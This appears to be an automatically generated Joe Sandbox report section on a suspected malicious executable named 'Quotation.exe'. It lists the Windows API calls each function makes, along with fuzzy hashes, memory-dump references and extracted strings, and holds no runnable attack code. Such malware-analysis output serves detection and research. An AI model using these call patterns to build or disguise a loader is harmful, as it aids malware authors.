Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7632578e959b8743e555d93462aae593c6b70bd748cc75729517915430590484
Instruction ID: 9b93fbf5896e52d0aec94dffecfd1c9f00b5a24855ff966aea37a5bd28a3262e
Opcode Fuzzy Hash: 7632578e959b8743e555d93462aae593c6b70bd748cc75729517915430590484
Instruction Fuzzy Hash: D141A072904705DFDF009F6CDAD2B8937F9EB0536AF20586AE6448A290F736E465CBD0

Function 004069E9 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00793200,00403326,?,00793200,?,00793200,?,?), ref: 00406A00

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction ID: af586fd2f7f6880044e5fe5766d6096d47c0719768b2310f5fb2dcc6f4abfd7b
Opcode Fuzzy Hash: fcbaaa44ab5e5c94c5d9c511509a2faa156d79933b004821766515c4fe93841a
Instruction Fuzzy Hash: 68E0BF32600119BB8F205B56DD04D9FBF6DEE927A07124026F906B6150D670EA51DAE4

Function 00406926 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000,?,00000000,?,00000000,004031A2,?,00000004,00000000,00000000,00000000,00000000), ref: 0040693D

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction ID: de6cc0abbc936f950c0aa48064430f9d9b1dfb465831d1c2e6fd43c94deb3c7e
Opcode Fuzzy Hash: f8dde0e6d0967dcd1486054d06716264d6198d5106f5dd6c4da627d3f0af441a
Instruction Fuzzy Hash: B7E0BF72200119BB8F215F46DD04D9FBF6DEE956A07114026B905A6150D670EA11D6E4

Function 6FC91A4A Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6FC9501C,00000004,00000040,6FC95034), ref: 6FC91A68

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: bc6b6a31cb32707a06dee19de5ac3c35ec8aa93cb4572cb650e90e3be42a5ffb
Instruction ID: b396547f6325313b67e0660c69f14f4c071ed5aa19b0f6101336520326051c3e
Opcode Fuzzy Hash: bc6b6a31cb32707a06dee19de5ac3c35ec8aa93cb4572cb650e90e3be42a5ffb
Instruction Fuzzy Hash: 32F0AC70919B42DACB188F1C94856093AF0B71A366B006D2EF34ADA340D33242209BAA

Function 004062B6 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00406983,?,?,?,?,Call,00000000,00000000), ref: 004062DA

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction ID: 8275c49ac47c74d38988e0f8258bf7c149b7cc7998a497f72a9ef83b4f38b8ad
Opcode Fuzzy Hash: 5d90062fdd1cff32f27602045ec2692a1b627fa5483aed50fd6290a01ccc32d2
Instruction Fuzzy Hash: 51D0123204020DBBDF11AF90DD01FAB372DAB08750F01443AFE16A40A0D775D531A718

Function 004054C6 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction ID: ded955796c7b3a29419b03b8f07dbed72bf973f4b2991851ad7e5473cbc7331c
Opcode Fuzzy Hash: b2e0c2379e296d93849bb49f42c53d0230087db54a3c83b1da74e836768489aa
Instruction Fuzzy Hash: C3C04C716446007ADA109B619E05F077759A791701F10C8297240E55E0C675E460CA2C

Function 004054E1 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,00405316), ref: 004054EF

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction ID: 87925707e6409367d6b01bd6df3e013852da7cf14c64ffa79ed0cacb9bd9d926
Opcode Fuzzy Hash: 1714e4f5a6add7520e2ba1d59cc8065429a1d3178019bc2ad80d0ec1eb9059a5
Instruction Fuzzy Hash: 28B09239684600AADA195B00EE09F467B62ABA4701F008428B240640B0CAB210A0DB18

Function 00403131 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,004035B5,?), ref: 0040313F

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction ID: 249934cc5d2069a5a678a88893d20fb7c04287045258dfdbdab4020963f10c22
Opcode Fuzzy Hash: eeb6e3b4f510f7bce7f4acd2004317b94e1f980229c798523801c224a6f07df3
Instruction Fuzzy Hash: 94B09231140200AADA214F009E0AF057B21AB90700F108434B290680F086711060EA0D

Function 6FC912F8 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,6FC911C4,-000000A0), ref: 6FC91302

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: d19664c5eb6189aba3374fac5faf28df8f79c124f9ca47575ec6cb20c832ec92
Instruction ID: 533b0800ce56697d19d8ae3e09cefa81aeb1e6ae6b27e43f4db6905c0429abb2
Opcode Fuzzy Hash: d19664c5eb6189aba3374fac5faf28df8f79c124f9ca47575ec6cb20c832ec92
Instruction Fuzzy Hash: CCB012B02004019FEE008B18DC0AF3033B4F70131AF001000F700D5040D1254830C514

Non-executed Functions

Function 6FC92351 Relevance: 18.7, APIs: 12, Instructions: 705stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6FC912F8: GlobalAlloc.KERNELBASE(00000040,?,6FC911C4,-000000A0), ref: 6FC91302

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6FC9294E
lstrcpyW.KERNEL32(00000008,?), ref: 6FC929A4
lstrcpyW.KERNEL32(00000808,?), ref: 6FC929AF
GlobalFree.KERNEL32(00000000), ref: 6FC929C0
GlobalFree.KERNEL32(?), ref: 6FC92A44
GlobalFree.KERNEL32(?), ref: 6FC92A4A
GlobalFree.KERNEL32(?), ref: 6FC92A50
GetModuleHandleW.KERNEL32(00000008), ref: 6FC92B1A
LoadLibraryW.KERNEL32(00000008), ref: 6FC92B2B
GetProcAddress.KERNEL32(?,?), ref: 6FC92B82
lstrlenW.KERNEL32(00000808), ref: 6FC92B9D

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: Global$Free$Alloclstrcpy$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 1042148487-0
Opcode ID: b1929af4ebba424fb01c095c0b3ba900a5f647f98bf6cfc0198b199116416e12
Instruction ID: 114b3575e2761d9c0249043e58bdc201da7adc363ac31c5108867b463067ab97
Opcode Fuzzy Hash: b1929af4ebba424fb01c095c0b3ba900a5f647f98bf6cfc0198b199116416e12
Instruction Fuzzy Hash: B3426F72A487029FD314CF39C5607DAB7E4FF89715F004A2EE5E996290FB70E5448B92

Function 004062E4 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00000000,?,0040623C,?,?), ref: 0040631F
GetShortPathNameW.KERNEL32(?,007A5688,00000400), ref: 00406328
GetShortPathNameW.KERNEL32(?,007A4E88,00000400), ref: 00406345
wsprintfA.USER32 ref: 00406363
GetFileSize.KERNEL32(00000000,00000000,007A4E88,C0000000,00000004,007A4E88,?), ref: 0040639B
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 004063AB
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 004063DB
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,007A4A88,00000000,-0000000A,00408984,00000000,[Rename],00000000,00000000,00000000), ref: 004063FB
GlobalFree.KERNEL32(00000000), ref: 0040640D
CloseHandle.KERNEL32(00000000), ref: 00406414

Part of subcall function 004068F9: GetFileAttributesW.KERNELBASE(?,0040340D,C:\Users\user\Desktop\Quotation.exe,80000000,00000003), ref: 004068FD
Part of subcall function 004068F9: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000), ref: 0040691D

Strings

[Rename], xrefs: 004063C3, 004063D2
%ls=%ls, xrefs: 00406359

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShort$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2900126502-461813615
Opcode ID: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction ID: 9f7f24d6a9d8affb6c81019e1e78af230b3462d5c5472edf7d8bbe76e1c752c2
Opcode Fuzzy Hash: a2b202ff8827565348ba147a21b9a484a8522b83e041da5fa409378b6696546f
Instruction Fuzzy Hash: 1B3128B16012117BD7206B358D49F7B3A5CEF81749B06453EF943FA2C2DA7D88628A7C

Function 00406D1B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406D90
CharNextW.USER32(?,?,?,00000000), ref: 00406D9F
CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406DA4
CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403C8F,C:\Users\user\AppData\Local\Temp\,74DF3420,004039A0), ref: 00406DBC

Strings

*?|<>/":, xrefs: 00406D7F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00406D22
C:\Users\user\AppData\Local\Temp\, xrefs: 00406D1B, 00406D1D

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
API String ID: 589700163-562438032
Opcode ID: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction ID: 64caea1e5fba35c947d9094266ac5fc002638ab42ea644ca00d5fa91912821bd
Opcode Fuzzy Hash: 5b032911993fa6072ca7f20f73d4f3d6e0cff76cb04f630808d27ad5f640f473
Instruction Fuzzy Hash: 7511D511B0063156DB30672A8C4097772E8DF69761756443BFDC6E32C0F77D8D9192B9

Function 00405739 Relevance: 12.1, APIs: 8, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00405756
GetSysColor.USER32 ref: 0040578F
SetTextColor.GDI32(?), ref: 004057A2
SetBkMode.GDI32(?,?), ref: 004057AE
GetSysColor.USER32(?), ref: 004057C2
SetBkColor.GDI32(?,?), ref: 004057D8
DeleteObject.GDI32(?), ref: 004057F4
CreateBrushIndirect.GDI32(?), ref: 004057FE

Memory Dump Source

Source File: 00000000.00000002.2182338365.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182315630.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182397533.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182914211.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quotation.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction ID: 26ea8d1a65f0c358df8059d13c2b59527feb86654ff2728a298fdc5f00fd0ae6
Opcode Fuzzy Hash: bf0799ea3bd6f053e04a74c3ecacf9df28762d59f89d86d460fcd2570ffda868
Instruction Fuzzy Hash: E221D675500B049FDB649F28DA4895BB7F4EF45711B108A3EE896A26A0DB38E814DF28

Function 6FC92049 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FC921BF

Part of subcall function 6FC912E1: lstrcpynW.KERNEL32(00000000,?,6FC9156A,?,6FC911C4,-000000A0), ref: 6FC912F1

GlobalAlloc.KERNEL32(00000040), ref: 6FC9212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FC9214C

Strings

@Hmu, xrefs: 6FC9216A

Memory Dump Source

Source File: 00000000.00000002.2232243133.000000006FC91000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FC90000, based on PE: true

Associated: 00000000.00000002.2232047523.000000006FC90000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232324372.000000006FC94000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2232716705.000000006FC96000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc90000_Quotation.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID: @Hmu
API String ID: 4216380887-887474944
Opcode ID: 6a6a76dd1e17e523189e33151ca89528c70e2b6a018c3b3753c01c5045c7b26e
Instruction ID: f3d9c6d7164589ae6b7dc3fa2df14f3169244f65e62c2c8937c661ddeba34858
Opcode Fuzzy Hash: 6a6a76dd1e17e523189e33151ca89528c70e2b6a018c3b3753c01c5045c7b26e
Instruction Fuzzy Hash: 85413571405705EFC7009F29C994AEA77B8FB06355B40423EEA88DB188FB7169A0CBA0

